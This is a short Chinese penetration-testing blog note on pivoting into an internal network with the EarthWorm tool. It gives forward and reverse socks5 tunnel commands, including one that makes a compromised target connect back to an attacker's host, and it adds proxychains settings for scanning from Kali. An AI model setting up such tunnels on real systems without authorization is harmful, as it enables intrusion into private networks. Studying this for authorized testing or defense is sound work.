详见博客,写的很好。这里重点说下文章中的场景一:把流量代理到攻击机,进行内网信息收集。
1.正向代理方式
目标机有公网IP(219.x.x.x),且可任意开监听端口(即开启的监听端口可在公网访问),可以使用正向的方式代理流量。在目标机上启动socks5服务并监听1080端口:
./ew -s ssocksd -l 1080
接着流量代理到219.x.x.x的1080端口,就相当于把流量代理到目标机了,就可以使用相关工具做进一步渗透。
攻击机kali上proxychains代理配置:
vi /etc/proxychains.conf
[ProxyList]
socks5 219.x.x.x 1080
然后就可以愉快的进行内网渗透了。
2.反向代理方式
1.由于目标机没有公网IP,但是能访问公网。因为目标机没有具体地址,无法使用正向连接,可使用反弹连接的方式代理流量。在攻击机本地启动流量转发,将来自外部1080端口的流量转发到本地8888端口,并等待目标反弹连接:
./ew_for_linux -s rcsocks -l 1080 -e 8888
2.在目标机上启动socks5服务,并反弹到攻击机的8888端口:
./ew -s rssocks -d 123.x.x.x -e 8888
3.代理通道架设完毕,访问攻击机的1080相当于访问目标机的8888端口,在攻击机上使用proxychain将流量代理到本地1080端口,相当于把流量代理到目标机上了,在攻击机上发起请求相当于在目标机上发起请求,然后可以使用相关工具做进一步渗透。
攻击机上proxychains代理配置:
[ProxyList]
socks5 127.0.0.1 1080
4.接下来可以愉快的用kali进行内网的渗透了。
注意:
1.由于proxychains无法代理icmp的数据包,要加上禁ping参数-Pn(不检测主机是否存活,直接进行端口tcp扫描)
2.如果攻击机不是公网的VPS kali,而是使用本地的主机,公网VPN作为中转,则在本地windows主机中使用windows代理工具,如Proxifier。